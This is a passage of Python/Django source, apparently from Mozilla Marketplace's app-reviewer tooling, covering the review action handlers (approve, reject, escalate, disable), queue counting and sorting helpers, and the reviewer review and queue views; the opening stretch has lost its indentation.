highest_status=amo.STATUS_PUBLIC)
self.set_reviewed()
# Note: Post save signals shouldn't happen here. All the set_*()
# methods pass _signal=False to prevent them from being sent. They are
# manually triggered in the view after the transaction is committed to
# avoid multiple indexing tasks getting fired with stale data.
#
# This does mean that we need to call update_version() manually to get
# the addon in the correct state before updating names. We do that,
# passing _signal=False again to prevent it from sending
# 'version_changed'. The post_save() that happen in the view will
# call it without that parameter, sending 'version_changed' normally.
self.addon.update_version(_signal=False)
self.addon.update_name_from_package_manifest()
self.addon.update_supported_locales()
self.addon.resend_version_changed_signal = True
if waffle.switch_is_active('iarc'):
self.addon.set_iarc_storefront_data()
self.create_note(amo.LOG.APPROVE_VERSION)
self.notify_email('pending_to_public', u'App approved: %s')
log.info(u'Making %s public' % self.addon)
def process_reject(self):
"""
Reject an app.
Changes status to Rejected.
Creates Rejection note/email.
"""
# Hold onto the status before we change it.
status = self.addon.status
self.set_files(amo.STATUS_DISABLED, self.version.files.all(),
hide_disabled_file=True)
# If this app is not packaged (packaged apps can have multiple
# versions) or if there aren't other versions with already reviewed
# files, reject the app also.
if (not self.addon.is_packaged or
not self.addon.versions.exclude(id=self.version.id)
.filter(files__status__in=amo.REVIEWED_STATUSES).exists()):
self.set_addon(status=amo.STATUS_REJECTED)
if self.in_escalate:
EscalationQueue.objects.filter(addon=self.addon).delete()
if self.in_rereview:
RereviewQueue.objects.filter(addon=self.addon).delete()
self.create_note(amo.LOG.REJECT_VERSION)
self.notify_email('pending_to_sandbox',
u'Your submission has been rejected: %s')
log.info(u'Making %s disabled' % self.addon)
# Assign reviewer incentive scores.
return ReviewerScore.award_points(self.request.amo_user, self.addon,
status, in_rereview=self.in_rereview)
def process_escalate(self):
"""
Ask for escalation for an app (EscalationQueue).
Doesn't change status.
Creates Escalation note/email.
"""
EscalationQueue.objects.get_or_create(addon=self.addon)
self.create_note(amo.LOG.ESCALATE_MANUAL)
log.info(u'Escalated review requested for %s' % self.addon)
self.notify_email('author_super_review', u'Submission Update: %s')
log.info(u'Escalated review requested for %s' % self.addon)
# Special senior reviewer email.
if not waffle.switch_is_active('comm-dashboard'):
data = self.get_context_data()
send_mail(u'Escalated Review Requested: %s' % data['name'],
'reviewers/emails/super_review.txt', data,
[settings.MKT_SENIOR_EDITORS_EMAIL],
attachments=self.get_attachments())
def process_comment(self):
"""
Editor comment (not visible to developer).
Doesn't change status.
Creates Reviewer Comment note/email.
"""
self.version.update(has_editor_comment=True)
self.create_note(amo.LOG.COMMENT_VERSION)
def process_clear_escalation(self):
"""
Clear app from escalation queue.
Doesn't change status.
Doesn't create note/email.
"""
EscalationQueue.objects.filter(addon=self.addon).delete()
self.create_note(amo.LOG.ESCALATION_CLEARED)
log.info(u'Escalation cleared for app: %s' % self.addon)
def process_clear_rereview(self):
"""
Clear app from re-review queue.
Doesn't change status.
Doesn't create note/email.
"""
RereviewQueue.objects.filter(addon=self.addon).delete()
self.create_note(amo.LOG.REREVIEW_CLEARED)
log.info(u'Re-review cleared for app: %s' % self.addon)
# Assign reviewer incentive scores.
return ReviewerScore.award_points(self.request.amo_user, self.addon,
self.addon.status, in_rereview=True)
def process_disable(self):
"""
Disables app, clears app from all queues.
Changes status to Disabled.
Creates Disabled note/email.
"""
if not acl.action_allowed(self.request, 'Apps', 'Edit'):
return
# Disable disables all files, not just those in this version.
self.set_files(amo.STATUS_DISABLED,
File.objects.filter(version__addon=self.addon),
hide_disabled_file=True)
self.addon.update(status=amo.STATUS_DISABLED)
if self.in_escalate:
EscalationQueue.objects.filter(addon=self.addon).delete()
if self.in_rereview:
RereviewQueue.objects.filter(addon=self.addon).delete()
self.addon.set_iarc_storefront_data(disable=True)
self.notify_email('disabled', u'App disabled by reviewer: %s')
self.create_note(amo.LOG.APP_DISABLED)
log.info(u'App %s has been disabled by a reviewer.' % self.addon)
class ReviewHelper(object):
    """
    A class that builds enough to render the form back to the user and
    process off to the correct handler.
    """
    def __init__(self, request=None, addon=None, version=None,
                 attachment_formset=None):
        # handler is set by get_review_type() below.
        self.handler = None
        self.required = {}
        self.addon = addon
        self.version = version
        # version may be None for incomplete apps; guard with short-circuit.
        self.all_files = version and version.files.all()
        self.attachment_formset = attachment_formset
        self.get_review_type(request, addon, version)
        self.actions = self.get_actions()

    def set_data(self, data):
        """Forward the cleaned form data to the underlying handler."""
        self.handler.set_data(data)

    def get_review_type(self, request, addon, version):
        """Pick the queue this app belongs to and build the handler.

        Escalation takes precedence over re-review; otherwise the app is
        treated as plain 'pending'.
        """
        if EscalationQueue.objects.filter(addon=addon).exists():
            queue = 'escalated'
        elif RereviewQueue.objects.filter(addon=addon).exists():
            queue = 'rereview'
        else:
            queue = 'pending'
        self.review_type = queue
        self.handler = ReviewApp(request, addon, version, queue,
                                 attachment_formset=self.attachment_formset)

    def get_actions(self):
        """Get the appropriate handler based on the action."""
        # Each action maps a handler method plus the metadata the review
        # form/template needs ('minimal' controls which form fields are
        # required for that action).
        public = {
            'method': self.handler.process_public,
            'minimal': False,
            'label': _lazy(u'Push to public'),
            'details': _lazy(u'This will approve the sandboxed app so it '
                             u'appears on the public side.')}
        reject = {
            'method': self.handler.process_reject,
            'label': _lazy(u'Reject'),
            'minimal': False,
            'details': _lazy(u'This will reject the app and remove it from '
                             u'the review queue.')}
        info = {
            'method': self.handler.request_information,
            'label': _lazy(u'Request more information'),
            'minimal': True,
            'details': _lazy(u'This will send the author(s) an email '
                             u'requesting more information.')}
        escalate = {
            'method': self.handler.process_escalate,
            'label': _lazy(u'Escalate'),
            'minimal': True,
            'details': _lazy(u'Flag this app for an admin to review.')}
        comment = {
            'method': self.handler.process_comment,
            'label': _lazy(u'Comment'),
            'minimal': True,
            'details': _lazy(u'Make a comment on this app. The author won\'t '
                             u'be able to see this.')}
        clear_escalation = {
            'method': self.handler.process_clear_escalation,
            'label': _lazy(u'Clear Escalation'),
            'minimal': True,
            'details': _lazy(u'Clear this app from the escalation queue. The '
                             u'author will get no email or see comments '
                             u'here.')}
        clear_rereview = {
            'method': self.handler.process_clear_rereview,
            'label': _lazy(u'Clear Re-review'),
            'minimal': True,
            'details': _lazy(u'Clear this app from the re-review queue. The '
                             u'author will get no email or see comments '
                             u'here.')}
        disable = {
            'method': self.handler.process_disable,
            'label': _lazy(u'Disable app'),
            'minimal': True,
            'details': _lazy(u'Disable the app, removing it from public '
                             u'results. Sends comments to author.')}

        actions = SortedDict()

        if not self.version:
            # Return early if there is no version, this app is incomplete.
            actions['info'] = info
            actions['comment'] = comment
            return actions

        file_status = self.version.files.values_list('status', flat=True)
        multiple_versions = (File.objects.exclude(version=self.version)
                                         .filter(
                                             version__addon=self.addon,
                                             status__in=amo.REVIEWED_STATUSES)
                                         .exists())
        # Privileged apps may only be approved/rejected by reviewers holding
        # the ReviewPrivileged permission.
        show_privileged = (not self.version.is_privileged
                           or acl.action_allowed(self.handler.request, 'Apps',
                                                 'ReviewPrivileged'))

        # Public.
        if ((self.addon.is_packaged and amo.STATUS_PUBLIC not in file_status
             and show_privileged)
            or (not self.addon.is_packaged and
                self.addon.status != amo.STATUS_PUBLIC)):
            actions['public'] = public

        # Reject.
        if self.addon.is_packaged and show_privileged:
            # Packaged apps reject the file only, or the app itself if there's
            # only a single version.
            if (not multiple_versions and
                self.addon.status not in [amo.STATUS_REJECTED,
                                          amo.STATUS_DISABLED]):
                actions['reject'] = reject
            elif multiple_versions and amo.STATUS_DISABLED not in file_status:
                actions['reject'] = reject
        elif not self.addon.is_packaged:
            # Hosted apps reject the app itself.
            if self.addon.status not in [amo.STATUS_REJECTED,
                                         amo.STATUS_DISABLED]:
                actions['reject'] = reject

        # Disable.
        if (acl.action_allowed(self.handler.request, 'Apps', 'Edit') and (
                self.addon.status != amo.STATUS_DISABLED or
                amo.STATUS_DISABLED not in file_status)):
            actions['disable'] = disable

        # Clear escalation.
        if self.handler.in_escalate:
            actions['clear_escalation'] = clear_escalation

        # Clear re-review.
        if self.handler.in_rereview:
            actions['clear_rereview'] = clear_rereview

        # Escalate.
        if not self.handler.in_escalate:
            actions['escalate'] = escalate

        # Request info and comment are always shown.
        actions['info'] = info
        actions['comment'] = comment

        return actions

    def process(self):
        """Call handler."""
        action = self.handler.data.get('action', '')
        if not action:
            raise NotImplementedError
        return self.actions[action]['method']()
def clean_sort_param(request, date_sort='created'):
    """Validate the ``sort``/``order`` GET parameters.

    Falls back to *date_sort* (ascending) whenever either parameter is
    missing or not one of the recognised values.
    """
    valid_sorts = ('name', 'created', 'nomination', 'num_abuse_reports')
    valid_orders = ('asc', 'desc')
    sort = request.GET.get('sort', date_sort)
    order = request.GET.get('order', 'asc')
    return (sort if sort in valid_sorts else date_sort,
            order if order in valid_orders else 'asc')
def create_sort_link(pretty_name, sort_field, get_params, sort, order):
    """Generate table header sort links.

    pretty_name -- name displayed on table header
    sort_field -- name of the sort_type GET parameter for the column
    get_params -- additional get_params to include in the sort_link
    sort -- the current sort type
    order -- the current sort order
    """
    # Clicking the column that is already sorted ascending flips it to
    # descending; any other click (re)sorts ascending.
    if sort == sort_field and order == 'asc':
        next_order = 'desc'
    else:
        next_order = 'asc'
    get_params.append(('sort', sort_field))
    get_params.append(('order', next_order))

    # Show little sorting sprite if sorting by this field.
    url_class = (' class="sort-icon ed-sprite-sort-%s"' % order
                 if sort == sort_field else '')

    return u'<a href="?%s"%s>%s</a>' % (urllib.urlencode(get_params, True),
                                        url_class, pretty_name)
class AppsReviewing(object):
    """
    Class to manage the list of apps a reviewer is currently reviewing.

    Data is stored in memcache.
    """

    def __init__(self, request):
        self.request = request
        self.user_id = request.amo_user.id
        # Per-reviewer cache key holding a comma-separated list of app ids.
        self.key = '%s:myapps:%s' % (settings.CACHE_PREFIX, self.user_id)

    def get_apps(self):
        """Return the apps this reviewer still holds a review lock on.

        An id from our list only counts if the shared 'review_viewing'
        cache entry still names this reviewer as the current viewer.
        """
        ids = []
        my_apps = cache.get(self.key)
        if my_apps:
            for id in my_apps.split(','):
                valid = cache.get(
                    '%s:review_viewing:%s' % (settings.CACHE_PREFIX, id))
                if valid and valid == self.user_id:
                    ids.append(id)

        apps = []
        for app in Webapp.objects.filter(id__in=ids):
            apps.append({
                'app': app,
                'app_attrs': json.dumps(
                    product_as_dict(self.request, app, False, 'reviewer'),
                    cls=JSONEncoder),
            })
        return apps

    def add(self, addon_id):
        """Record *addon_id* as being reviewed by this reviewer.

        The set() below de-duplicates; the TTL is twice the viewing
        heartbeat interval so entries expire if the reviewer goes away.
        """
        my_apps = cache.get(self.key)
        if my_apps:
            apps = my_apps.split(',')
        else:
            apps = []
        apps.append(addon_id)
        cache.set(self.key, ','.join(map(str, set(apps))),
                  amo.EDITOR_VIEWING_INTERVAL * 2)
def device_queue_search(request):
    """
    Returns a queryset that can be used as a base for searching the device
    specific queue.
    """
    lookups = dict(type=amo.ADDON_WEBAPP,
                   status=amo.STATUS_PENDING,
                   disabled_by_user=False)

    signature = request.GET.get('pro')
    if signature:
        # Narrow to apps whose feature requirements the profile satisfies.
        profile = FeatureProfile.from_signature(signature)
        lookups.update(
            profile.to_kwargs(prefix='_current_version__features__has_'))

    qs = Webapp.objects.filter(**lookups)
    return Webapp.version_and_file_transformer(qs)
########NEW FILE########
__FILENAME__ = views
import collections
import datetime
import functools
import HTMLParser
import json
import os
import sys
import traceback
import urllib
from django import http
from django.conf import settings
from django.core.exceptions import PermissionDenied
from django.core.urlresolvers import reverse
from django.db import transaction
from django.db.models import Count, Q
from django.db.models.signals import post_save
from django.shortcuts import get_object_or_404, redirect, render
import commonware.log
import jinja2
import requests
from elasticutils import F
from rest_framework.exceptions import ParseError
from rest_framework.generics import CreateAPIView, ListAPIView
from rest_framework.response import Response
from tower import ugettext as _
from waffle.decorators import waffle_switch
import amo
from abuse.models import AbuseReport
from access import acl
from addons.decorators import addon_view
from addons.models import AddonDeviceType, Version
from addons.signals import version_changed
from amo.decorators import (any_permission_required, json_view,
permission_required)
from amo.helpers import absolutify, urlparams
from amo.models import manual_order
from amo.utils import (escape_all, HttpResponseSendFile, JSONEncoder, paginate,
redirect_for_login, smart_decode)
from cache_nuggets.lib import Token
from devhub.models import ActivityLog, ActivityLogAttachment
from editors.forms import MOTDForm
from editors.models import (EditorSubscription, EscalationQueue, RereviewQueue,
ReviewerScore)
from editors.views import reviewer_required
from files.models import File
from lib.crypto.packaged import SigningError
from reviews.models import Review, ReviewFlag
from tags.models import Tag
from translations.query import order_by_translation
from users.models import UserProfile
from zadmin.models import set_config, unmemoized_get_config
import mkt
from mkt.api.authentication import (RestOAuthAuthentication,
RestSharedSecretAuthentication)
from mkt.api.authorization import GroupPermission
from mkt.api.base import SlugOrIdMixin
from mkt.comm.forms import CommAttachmentFormSet
from mkt.ratings.forms import ReviewFlagFormSet
from mkt.regions.utils import parse_region
from mkt.reviewers.forms import ApiReviewersSearchForm, ApproveRegionForm
from mkt.reviewers.serializers import (ReviewersESAppSerializer,
ReviewingSerializer)
from mkt.reviewers.utils import (AppsReviewing, clean_sort_param,
device_queue_search)
from mkt.search.utils import S
from mkt.search.views import SearchView
from mkt.site import messages
from mkt.site.helpers import product_as_dict
from mkt.submit.forms import AppFeaturesForm
from mkt.webapps.models import Webapp, WebappIndexer
from . import forms
from .models import AppCannedResponse
QUEUE_PER_PAGE = 100
log = commonware.log.getLogger('z.reviewers')
@reviewer_required
def route_reviewer(request):
    """
    Redirect to apps home page if app reviewer.
    """
    home_url = reverse('reviewers.home')
    return http.HttpResponseRedirect(home_url)
@reviewer_required(only='app')
def home(request):
    """Reviewer tools landing page: queue progress and recent review stats."""
    # Buckets used to label queue ages in the progress table.
    durations = (('new', _('New Apps (Under 5 days)')),
                 ('med', _('Passable (5 to 10 days)')),
                 ('old', _('Overdue (Over 10 days)')))

    progress, percentage = _progress()

    data = context(
        request,
        reviews_total=ActivityLog.objects.total_reviews(webapp=True)[:5],
        reviews_monthly=ActivityLog.objects.monthly_reviews(webapp=True)[:5],
        #new_editors=EventLog.new_editors(),  # Bug 747035
        #eventlog=ActivityLog.objects.editor_events()[:6],  # Bug 746755
        progress=progress,
        percentage=percentage,
        durations=durations
    )
    return render(request, 'reviewers/home.html', data)
def queue_counts(request, queue_type=None):
    """Compute the size of each reviewer queue.

    queue_type -- optional restriction: a single queue name (str) returns
        just that count; a list of queue names returns a dict limited to
        those queues; None (the default) returns every count.

    The 'device' count is only included when the request carries a device
    profile signature ('pro' GET parameter), since it depends on it.

    Note: this previously tested ``isinstance(type, ...)`` against the
    *builtin* ``type`` (no such parameter existed), so the filtering
    branches were dead code; ``queue_type`` restores the intended
    behavior while keeping the old no-argument call compatible.
    """
    excluded_ids = EscalationQueue.objects.no_cache().values_list('addon',
                                                                  flat=True)
    public_statuses = amo.WEBAPPS_APPROVED_STATUSES

    counts = {
        'pending': Webapp.objects.no_cache()
                         .exclude(id__in=excluded_ids)
                         .filter(type=amo.ADDON_WEBAPP,
                                 disabled_by_user=False,
                                 status=amo.STATUS_PENDING)
                         .count(),
        'rereview': RereviewQueue.objects.no_cache()
                                 .exclude(addon__in=excluded_ids)
                                 .filter(addon__disabled_by_user=False)
                                 .count(),
        # This will work as long as we disable files of existing unreviewed
        # versions when a new version is uploaded.
        'updates': File.objects.no_cache()
                       .exclude(version__addon__id__in=excluded_ids)
                       .filter(version__addon__type=amo.ADDON_WEBAPP,
                               version__addon__disabled_by_user=False,
                               version__addon__is_packaged=True,
                               version__addon__status__in=public_statuses,
                               version__deleted=False,
                               status=amo.STATUS_PENDING)
                       .count(),
        'escalated': EscalationQueue.objects.no_cache()
                                    .filter(addon__disabled_by_user=False)
                                    .count(),
        'moderated': Review.objects.no_cache().filter(
                                       addon__type=amo.ADDON_WEBAPP,
                                       reviewflag__isnull=False,
                                       editorreview=True)
                                   .count(),
        'region_cn': Webapp.objects.pending_in_region(mkt.regions.CN).count(),
    }

    if 'pro' in request.GET:
        counts.update({'device': device_queue_search(request).count()})

    if isinstance(queue_type, basestring):
        # A single queue name was requested: return just that count.
        return counts[queue_type]

    rv = {}
    for k, v in counts.items():
        if not isinstance(queue_type, list) or k in queue_type:
            rv[k] = v
    return rv
def _progress():
    """Returns unreviewed apps progress.

    Return the number of apps still unreviewed for a given period of time and
    the percentage.
    """
    days_ago = lambda n: datetime.datetime.now() - datetime.timedelta(days=n)
    excluded_ids = EscalationQueue.objects.values_list('addon', flat=True)
    public_statuses = amo.WEBAPPS_APPROVED_STATUSES

    # Maps queue name -> (base queryset, date field the age is measured on).
    base_filters = {
        'pending': (Webapp.objects.rated()
                    .exclude(id__in=excluded_ids)
                    .filter(status=amo.STATUS_PENDING,
                            disabled_by_user=False,
                            _latest_version__deleted=False),
                    '_latest_version__nomination'),
        'rereview': (RereviewQueue.objects
                     .exclude(addon__in=excluded_ids)
                     .filter(addon__disabled_by_user=False),
                     'created'),
        'escalated': (EscalationQueue.objects
                      .filter(addon__disabled_by_user=False),
                      'created'),
        'updates': (File.objects
                    .exclude(version__addon__id__in=excluded_ids)
                    .filter(version__addon__type=amo.ADDON_WEBAPP,
                            version__addon__disabled_by_user=False,
                            version__addon__is_packaged=True,
                            version__addon__status__in=public_statuses,
                            version__deleted=False,
                            status=amo.STATUS_PENDING),
                    'version__nomination')
    }

    # Age bucket -> (ORM lookup operator, cutoff value(s)).
    operators_and_values = {
        'new': ('gt', days_ago(5)),
        'med': ('range', (days_ago(10), days_ago(5))),
        'old': ('lt', days_ago(10)),
        'week': ('gte', days_ago(7))
    }

    types = base_filters.keys()
    progress = {}
    for t in types:
        tmp = {}
        base_query, field = base_filters[t]
        for k in operators_and_values.keys():
            operator, value = operators_and_values[k]
            filter_ = {}
            filter_['%s__%s' % (field, operator)] = value
            tmp[k] = base_query.filter(**filter_).count()
        progress[t] = tmp

    # Return the percent of (p)rogress out of (t)otal.
    # Note: safe from ZeroDivisionError because p > 0 implies total > 0.
    pct = lambda p, t: (p / float(t)) * 100 if p > 0 else 0
    percentage = {}
    for t in types:
        total = progress[t]['new'] + progress[t]['med'] + progress[t]['old']
        percentage[t] = {}
        for duration in ('new', 'med', 'old'):
            percentage[t][duration] = pct(progress[t][duration], total)

    return (progress, percentage)
def context(request, **kw):
    """Build the base template context shared by reviewer pages.

    Any keyword arguments extend (and may override) the defaults.
    """
    statuses = {}
    for key, value in amo.STATUS_CHOICES_API.items():
        statuses[key] = unicode(value)
    ctx = {'motd': unmemoized_get_config('mkt_reviewers_motd'),
           'queue_counts': queue_counts(request),
           'search_url': reverse('reviewers-search-api'),
           'statuses': statuses,
           'point_types': amo.REVIEWED_MARKETPLACE}
    ctx.update(kw)
    return ctx
def _review(request, addon, version):
    """Render (GET) or process (POST) the review page for one app version.

    On a valid POST this applies the chosen review action via the form's
    ReviewHelper and redirects back to the queue; otherwise it renders the
    review template.
    """
    # Guard: reviewers may not review their own apps unless explicitly
    # allowed by settings or admin permission.
    if (not settings.ALLOW_SELF_REVIEWS and
        not acl.action_allowed(request, 'Admin', '%') and
        addon.has_author(request.amo_user)):
        messages.warning(request, _('Self-reviews are not allowed.'))
        return redirect(reverse('reviewers.home'))

    # Guard: blocklisted apps need the senior-reviewer permission.
    if (addon.status == amo.STATUS_BLOCKED and
        not acl.action_allowed(request, 'Apps', 'ReviewEscalated')):
        messages.warning(
            request, _('Only senior reviewers can review blocklisted apps.'))
        return redirect(reverse('reviewers.home'))

    attachment_formset = CommAttachmentFormSet(data=request.POST or None,
                                               files=request.FILES or None,
                                               prefix='attachment')
    form = forms.get_review_form(data=request.POST or None,
                                 files=request.FILES or None, request=request,
                                 addon=addon, version=version,
                                 attachment_formset=attachment_formset)
    postdata = request.POST if request.method == 'POST' else None
    all_forms = [form, attachment_formset]

    # Incomplete apps may have no version at all; only then do we have
    # app-features to show/edit.
    if version:
        features_list = [unicode(f) for f in version.features.to_list()]
        appfeatures_form = AppFeaturesForm(data=postdata,
                                           instance=version.features)
        all_forms.append(appfeatures_form)
    else:
        appfeatures_form = None
        features_list = None

    queue_type = form.helper.review_type
    redirect_url = reverse('reviewers.apps.queue_%s' % queue_type)
    is_admin = acl.action_allowed(request, 'Apps', 'Edit')

    if request.method == 'POST' and all(f.is_valid() for f in all_forms):
        old_types = set(o.id for o in addon.device_types)
        new_types = set(form.cleaned_data.get('device_override'))

        old_features = set(features_list)
        new_features = set(unicode(f) for f
                           in appfeatures_form.instance.to_list())

        if form.cleaned_data.get('action') == 'public':
            if old_types != new_types:
                # The reviewer overrode the device types. We need to not
                # publish this app immediately.
                if addon.make_public == amo.PUBLIC_IMMEDIATELY:
                    addon.update(make_public=amo.PUBLIC_WAIT)

                # And update the device types to what the reviewer set.
                AddonDeviceType.objects.filter(addon=addon).delete()
                for device in form.cleaned_data.get('device_override'):
                    addon.addondevicetype_set.create(device_type=device)

                # Log that the reviewer changed the device types.
                added_devices = new_types - old_types
                removed_devices = old_types - new_types
                msg = _(u'Device(s) changed by '
                        'reviewer: {0}').format(', '.join(
                    [_(u'Added {0}').format(unicode(amo.DEVICE_TYPES[d].name))
                     for d in added_devices] +
                    [_(u'Removed {0}').format(
                        unicode(amo.DEVICE_TYPES[d].name))
                     for d in removed_devices]))
                amo.log(amo.LOG.REVIEW_DEVICE_OVERRIDE, addon,
                        addon.current_version, details={'comments': msg})

            if old_features != new_features:
                # The reviewer overrode the requirements. We need to not
                # publish this app immediately.
                if addon.make_public == amo.PUBLIC_IMMEDIATELY:
                    addon.update(make_public=amo.PUBLIC_WAIT)

                appfeatures_form.save(mark_for_rereview=False)

                # Log that the reviewer changed the minimum requirements.
                added_features = new_features - old_features
                removed_features = old_features - new_features

                fmt = ', '.join(
                    [_(u'Added {0}').format(f) for f in added_features] +
                    [_(u'Removed {0}').format(f) for f in removed_features])
                # L10n: {0} is the list of requirements changes.
                msg = _(u'Requirements changed by reviewer: {0}').format(fmt)
                amo.log(amo.LOG.REVIEW_FEATURES_OVERRIDE, addon,
                        addon.current_version, details={'comments': msg})

        # Run the selected review action (approve/reject/escalate/...).
        score = form.helper.process()

        if form.cleaned_data.get('notify'):
            # TODO: bug 741679 for implementing notifications in Marketplace.
            EditorSubscription.objects.get_or_create(user=request.amo_user,
                                                     addon=addon)

        is_tarako = form.cleaned_data.get('is_tarako', False)
        if is_tarako:
            Tag(tag_text='tarako').save_tag(addon)
        else:
            Tag(tag_text='tarako').remove_tag(addon)

        # Success message.
        if score:
            score = ReviewerScore.objects.filter(user=request.amo_user)[0]
            # L10N: {0} is the type of review. {1} is the points they earned.
            # {2} is the points they now have total.
            success = _(
                u'"{0}" successfully processed (+{1} points, {2} total).'
                .format(unicode(amo.REVIEWED_CHOICES[score.note_key]),
                        score.score,
                        ReviewerScore.get_total(request.amo_user)))
        else:
            success = _('Review successfully processed.')
        messages.success(request, success)

        return redirect(redirect_url)

    canned = AppCannedResponse.objects.all()
    actions = form.helper.actions.items()

    try:
        if not version:
            raise Version.DoesNotExist
        # Most recent previously-approved version, used to diff against.
        show_diff = (addon.versions.exclude(id=version.id)
                     .filter(files__isnull=False,
                             created__lt=version.created,
                             files__status=amo.STATUS_PUBLIC)
                     .latest())
    except Version.DoesNotExist:
        show_diff = None

    # The actions we should show a minimal form from.
    # NOTE(review): despite the name, this collects the actions WITHOUT the
    # 'minimal' flag — confirm against the template before renaming.
    actions_minimal = [k for (k, a) in actions if not a.get('minimal')]

    # We only allow the user to check/uncheck files for "pending"
    allow_unchecking_files = form.helper.review_type == "pending"

    versions = (Version.with_deleted.filter(addon=addon)
                .order_by('-created')
                .transform(Version.transformer_activity)
                .transform(Version.transformer))

    product_attrs = {
        'product': json.dumps(
            product_as_dict(request, addon, False, 'reviewer'),
            cls=JSONEncoder),
        'manifest_url': addon.manifest_url,
    }

    pager = paginate(request, versions, 10)

    num_pages = pager.paginator.num_pages
    count = pager.paginator.count

    ctx = context(request, version=version, product=addon, pager=pager,
                  num_pages=num_pages, count=count,
                  form=form, canned=canned, is_admin=is_admin,
                  status_types=amo.MKT_STATUS_CHOICES, show_diff=show_diff,
                  allow_unchecking_files=allow_unchecking_files,
                  actions=actions, actions_minimal=actions_minimal,
                  tab=queue_type, product_attrs=product_attrs,
                  attachment_formset=attachment_formset,
                  appfeatures_form=appfeatures_form)

    if features_list is not None:
        ctx['feature_list'] = features_list

    return render(request, 'reviewers/review.html', ctx)
@transaction.commit_manually
def app_review(request, addon):
    """Review view wrapper around _review() with manual transaction control.

    Commits the whole review in one transaction, then fires the post-save /
    version_changed signals only after the commit so indexing tasks never
    see stale data. (Decorators below apply access control and addon
    resolution.)
    """
    version = addon.latest_version
    resp = None
    try:
        resp = _review(request, addon, version)
    except SigningError, exc:
        # Signing failed: undo the review, surface the error, and keep the
        # message commit so the user sees it after the redirect.
        transaction.rollback()
        messages.error(request, 'Signing Error: %s' % exc)
        transaction.commit()
        return redirect(
            reverse('reviewers.apps.review', args=[addon.app_slug]))
    except Exception:
        transaction.rollback()
        raise
    else:
        transaction.commit()
        # We (hopefully) have been avoiding sending send post_save and
        # version_changed signals in the review process till now (_review()
        # uses ReviewHelper which should have done all of its update() calls
        # with _signal=False).
        #
        # Now is a good time to send them: the transaction we were in has been
        # committed, so we know everything is ok. This is important: we need
        # them to index the app or call update_version() if that wasn't done
        # before already.
        if request.method == 'POST':
            try:
                post_save.send(sender=Webapp, instance=addon, created=False)
                post_save.send(sender=Version, instance=version, created=False)
                if getattr(addon, 'resend_version_changed_signal', False):
                    version_changed.send(sender=addon)
                    del addon.resend_version_changed_signal
            except Exception:
                transaction.rollback()
                raise
            else:
                transaction.commit()
        if resp:
            return resp
        # NOTE(review): bare `raise` with no active exception — only reached
        # if _review() returned a falsy response, which should not happen;
        # confirm whether this should be an explicit error instead.
        raise
# Pairs an app with the datetime used to sort it within a review queue.
QueuedApp = collections.namedtuple('QueuedApp', 'app created')
def _queue(request, apps, tab, pager_processor=None, date_sort='created',
           template='reviewers/queue.html', data=None):
    """Paginate *apps* and render a reviewer queue page for the given tab."""
    per_page = request.GET.get('per_page', QUEUE_PER_PAGE)
    pager = paginate(request, apps, per_page)

    ctx = dict(addons=pager.object_list,
               pager=pager,
               tab=tab,
               search_form=_get_search_form(request),
               date_sort=date_sort)

    # Additional context variables.
    if data is not None:
        ctx.update(data)

    return render(request, template, context(request, **ctx))
def _do_sort(request, qs, date_sort='created'):
    """Returns sorted Webapp queryset."""
    # Webapp querysets sort directly; queue objects sort via their addon FK.
    sorter = _do_sort_webapp if qs.model is Webapp else _do_sort_queue_obj
    return sorter(request, qs, date_sort)
def _do_sort_webapp(request, qs, date_sort):
    """
    Column sorting logic based on request GET parameters.
    """
    sort_type, order = clean_sort_param(request, date_sort=date_sort)
    order_by = ('-' if order == 'desc' else '') + sort_type

    # Sort.
    if sort_type == 'name':
        # Sorting by name translation.
        return order_by_translation(qs, order_by)

    elif sort_type == 'num_abuse_reports':
        return (qs.annotate(num_abuse_reports=Count('abuse_reports'))
                  .order_by(order_by))

    else:
        # Priority-flagged apps always float to the top of the queue.
        return qs.order_by('-priority_review', order_by)
def _do_sort_queue_obj(request, qs, date_sort):
    """
    Column sorting logic based on request GET parameters.

    Deals with objects with joins on the Addon (e.g. RereviewQueue, Version).
    Returns qs of apps.
    """
    sort_type, order = clean_sort_param(request, date_sort=date_sort)
    sort_str = sort_type

    if sort_type not in [date_sort, 'name']:
        sort_str = 'addon__' + sort_type

    # sort_str includes possible joins when ordering.
    # sort_type is the name of the field to sort on without desc/asc markers.
    # order_by is the name of the field to sort on with desc/asc markers.
    order_by = ('-' if order == 'desc' else '') + sort_str

    # Sort.
    if sort_type == 'name':
        # Sorting by name translation through an addon foreign key.
        return order_by_translation(
            Webapp.objects.filter(id__in=qs.values_list('addon', flat=True)),
            order_by)

    elif sort_type == 'num_abuse_reports':
        qs = qs.annotate(num_abuse_reports=Count('abuse_reports'))

    # Convert sorted queue object queryset to sorted app queryset.
    # manual_order preserves the queue ordering when re-fetching as Webapps.
    sorted_app_ids = (qs.order_by('-addon__priority_review', order_by)
                        .values_list('addon', flat=True))
    qs = Webapp.objects.filter(id__in=sorted_app_ids)
    return manual_order(qs, sorted_app_ids, 'addons.id')
@reviewer_required(only='app')
def queue_apps(request):
    """Queue of pending apps awaiting initial review, by nomination date."""
    # Escalated apps live in their own queue; exclude them here.
    excluded_ids = EscalationQueue.objects.no_cache().values_list('addon',
                                                                  flat=True)

    qs = (Version.objects.no_cache().filter(
        files__status=amo.STATUS_PENDING, addon__type=amo.ADDON_WEBAPP,
        addon__disabled_by_user=False,
        addon__status=amo.STATUS_PENDING)
        .exclude(addon__id__in=excluded_ids)
        .order_by('nomination', 'created')
        .select_related('addon', 'files').no_transforms())

    apps = _do_sort(request, qs, date_sort='nomination')
    apps = [QueuedApp(app, app.all_versions[0].nomination)
            for app in Webapp.version_and_file_transformer(apps)]

    return _queue(request, apps, 'pending', date_sort='nomination')
@reviewer_required(only='app')
def queue_region(request, region=None):
    """Queue of apps pending approval for one special region."""
    # TODO: Create a landing page that lists all the special regions.
    if region is None:
        raise http.Http404

    region = parse_region(region)
    # Geodata column storing when the app was nominated for this region.
    column = '_geodata__region_%s_nominated' % region.slug

    qs = Webapp.objects.pending_in_region(region)
    apps = _do_sort(request, qs, date_sort=column)
    apps = [QueuedApp(app, app.geodata.get_nominated_date(region))
            for app in apps]

    return _queue(request, apps, 'region', date_sort=column,
                  template='reviewers/queue_region.html',
                  data={'region': region})
@reviewer_required(only='app')
def queue_rereview(request):
    """Queue of apps flagged for re-review (excluding escalated ones)."""
    excluded_ids = EscalationQueue.objects.no_cache().values_list('addon',
                                                                  flat=True)
    rqs = (RereviewQueue.objects.no_cache()
                        .filter(addon__type=amo.ADDON_WEBAPP,
                                addon__disabled_by_user=False)
                        .exclude(addon__in=excluded_ids))
